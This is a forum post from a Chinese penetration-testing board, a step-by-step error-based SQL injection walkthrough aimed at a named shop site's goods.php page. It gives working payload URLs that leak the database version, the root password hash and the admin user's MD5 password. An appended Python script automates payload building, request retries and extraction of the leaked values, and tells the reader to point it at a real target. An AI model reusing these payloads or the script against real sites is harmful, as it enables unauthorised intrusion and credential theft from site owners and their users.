中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Blind injection, detailed walkthrough

Author: admin    Time: 2012-9-5 14:59
Determining the version number (each URL below forces MySQL to raise "Duplicate entry '...' for key 'group_key'", an error whose message echoes the selected value; this is error-based injection rather than a purely blind one, and because floor(rand()*2) is unseeded and the derived table has only two rows, the collision fires on only a fraction of requests, so repeat the request a few times)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determining the operating system (@@version_compile_os)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root password hash (read from mysql.user; the user name is spelled with char() so the payload needs no quote characters)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names of the current database (the limit N,1 offset steps through the tables one at a time)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column of the current database table (same offset stepping, now over information_schema.COLUMNS)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column of the current database table

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


Obtaining the admin password (MD5) together with the user name, joined with char(94) ('^') as a separator

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection (union form of the same duplicate-key trick; rand(0) is seeded, so the collision is deterministic, but it needs at least three rows, which is why information_schema.tables is used as the row source)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
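Added example, not code from the original post: a small Python helper that covers both the URL-based section above and the union-form queries in this section. It builds the (1,1)>(... group by x) payload around any single-value inner subquery, spells string constants with char() as the post does, steps through information_schema with limit offsets, and parses the leaked value back out of MySQL's "Duplicate entry" message. The host, script and parameter names are the ones shown in the post; the error page it parses offline is constructed here in the rough shape of an ECShop error dump and is not real output from that site.

```python
import re
from urllib.parse import quote

# Added example (not code from the original post). The host, script and
# parameter names are those shown in the post; the response bodies below are
# constructed for offline use and are not real output from that site.
BASE_URL = "http://www.baiud.com/goods.php"


def char_literal(s: str) -> str:
    """Spell a string as char(n,n,...) so the payload needs no quote characters."""
    return "char(" + ",".join(str(b) for b in s.encode("utf-8")) + ")"


def error_payload(inner: str) -> str:
    """Wrap a one-row, one-column subquery in the post's (1,1)>(...) construct.

    concat(value, 0x3a, floor(rand()*2)) is used as a GROUP BY key over two rows;
    when the key collides MySQL raises error 1062 and echoes the key, value included.
    """
    return ("1 and (1,1)>(select count(*),concat((%s),0x3a,floor(rand()*2)) x "
            "from (select 1 union select 2) a group by x limit 1)#" % inner)


def attack_url(inner: str, goods_id: int = 352) -> str:
    """Build the full GET URL; the characters left unencoded match the post's URLs."""
    return "%s?id=%d&wsid=%s" % (BASE_URL, goods_id,
                                quote(error_payload(inner), safe="(),*=@"))


def table_name_query(schema: str, offset: int) -> str:
    """Inner query enumerating the table names of one schema, one per offset."""
    return ("select TABLE_NAME from information_schema.tables "
            "where TABLE_SCHEMA=%s limit %d,1" % (char_literal(schema), offset))


def column_name_query(schema: str, table: str, offset: int) -> str:
    """Inner query enumerating the column names of one table, one per offset."""
    return ("select COLUMN_NAME from information_schema.COLUMNS "
            "where TABLE_SCHEMA=%s and TABLE_NAME=%s limit %d,1"
            % (char_literal(schema), char_literal(table), offset))


# MySQL's message: Duplicate entry 'LEAKED:0' for key 'group_key'
# (newer servers write the key name as '<group_key>').
LEAK_RE = re.compile(r"Duplicate entry '(.*):[01]' for key '<?group_key>?'")


def extract_leak(body: str):
    """Pull the leaked value out of an error page, or None if no collision occurred."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def harvest(fetch, inner: str, tries: int = 8):
    """Request the page until the GROUP BY collision fires.

    With an unseeded rand() over two rows the collision happens on only about a
    quarter of requests, so the same URL is fetched several times. `fetch` is any
    callable mapping a URL to a response body (a requests.get wrapper in practice).
    """
    url = attack_url(inner)
    for _ in range(tries):
        leak = extract_leak(fetch(url))
        if leak is not None:
            return leak
    return None


def make_demo_fetch(value: str):
    """Constructed stand-in for a vulnerable page: the first two requests return a
    normal page, the third returns an ECShop-style MySQL error dump (not real output)."""
    calls = {"n": 0}

    def fetch(url: str) -> str:
        calls["n"] += 1
        if calls["n"] < 3:
            return "<html><body>goods page, query ran without a collision</body></html>"
        return ("<b>MySQL server error report:</b> Array ( [error] => Duplicate entry "
                "'%s:1' for key 'group_key' ) [errno] => 1062" % value)
    return fetch


if __name__ == "__main__":
    print(attack_url("select @@version"))
    print(harvest(make_demo_fetch("5.1.73-log"), "select @@version"))
```

To use it against a real target, replace the demo fetch with a function that performs the HTTP request and returns the body; harvest() keeps retrying because the unseeded floor(rand()*2) over two rows only collides on roughly one request in four. The post's second section sidesteps that with rand(0), which is deterministic but needs at least three rows, hence its use of information_schema.tables as the row source. MySQL also truncates the key it echoes in the Duplicate entry message, so long values (a concat of several columns, for instance) should be read in slices with substring().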




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2